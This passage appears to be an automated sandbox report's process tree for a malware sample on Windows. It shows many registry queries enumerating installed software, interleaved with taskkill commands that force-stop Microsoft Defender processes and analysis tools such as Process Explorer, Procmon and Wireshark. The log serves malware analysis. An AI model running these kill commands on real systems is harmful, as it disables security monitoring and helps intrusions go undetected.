C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1776
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:676
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1740
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2008
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1128
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1176
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:1876
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1600
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1436
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1468
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1680
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1688
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:812
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:2008
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:300
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1188
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:1752
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:2036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1876
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1672
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1860
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:872
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:2016
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1380
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1152
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:1128
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1864
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:316
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1372
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1256
-
-
-
C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F 2⤵
- Kills process with taskkill
PID:1600
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1464
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:1672
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:2016
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:2032
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64 3⤵ PID:1756
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32 3⤵ PID:832
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1744
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64 3⤵ PID:1964
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32 3⤵ PID:812
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1548
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:1152
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:400
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:460
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64 3⤵ PID:476
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32 3⤵ PID:300
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:2040
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:316
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:1120
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1832
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:1504
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:1632
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1772
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:1920
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:2004
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1872
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:440
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:1488
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1232
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:1072
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:1392
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1836
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:1896
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:1408
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1756
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64 3⤵ PID:1556
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32 3⤵ PID:1152
-
-
-
C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F 2⤵
- Kills process with taskkill
PID:1880
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1660
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64 3⤵ PID:300
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32 3⤵ PID:1748
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1120
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64 3⤵ PID:1256
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32 3⤵ PID:1400
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:2012
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64 3⤵ PID:1920
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32 3⤵ PID:1116
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1508
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64 3⤵ PID:1488
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32 3⤵ PID:2040
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1872
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64 3⤵ PID:1240
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32 3⤵ PID:1772
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1364
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64 3⤵ PID:1576
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32 3⤵ PID:1608
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1876
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64 3⤵ PID:324
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32 3⤵ PID:1476
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1172
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64 3⤵ PID:684
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32 3⤵ PID:568
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1688
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64 3⤵ PID:1472
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32 3⤵ PID:1392
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1468
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64 3⤵ PID:1896
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32 3⤵ PID:832
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:2008
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64 3⤵ PID:1556
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32 3⤵ PID:1864
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1128
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64 3⤵ PID:1740
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32 3⤵ PID:1544
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:812
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64 3⤵ PID:316
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32 3⤵ PID:1504
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1256
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64 3⤵ PID:992
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32 3⤵ PID:1212
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1116
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64 3⤵ PID:1492
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32 3⤵ PID:1956
-
-
-
C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F 2⤵
- Kills process with taskkill
PID:676
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:2032
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64 3⤵ PID:1608
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32 3⤵ PID:324
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1844
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64 3⤵ PID:684
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32 3⤵ PID:1936
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:764
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64 3⤵ PID:1392
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32 3⤵ PID:1600
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1380
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64 3⤵ PID:1152
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32 3⤵ PID:1556
-
-
-
C:\Windows\system32\cmd.exe cmd.exe 2⤵ PID:1972
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64 3⤵ PID:1176
-
-
C:\Windows\system32\reg.exe reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32 3⤵ PID:1544
-
-
-
C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F 2⤵
- Kills process with taskkill
PID:1672
-
-
C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F 2⤵
- Kills process with taskkill
PID:1488
-
-
C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F 2⤵
- Kills process with taskkill
PID:1608
-
-
C:\Windows\System32\taskkill.exe "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F 2⤵
- Kills process with taskkill
PID:1244
-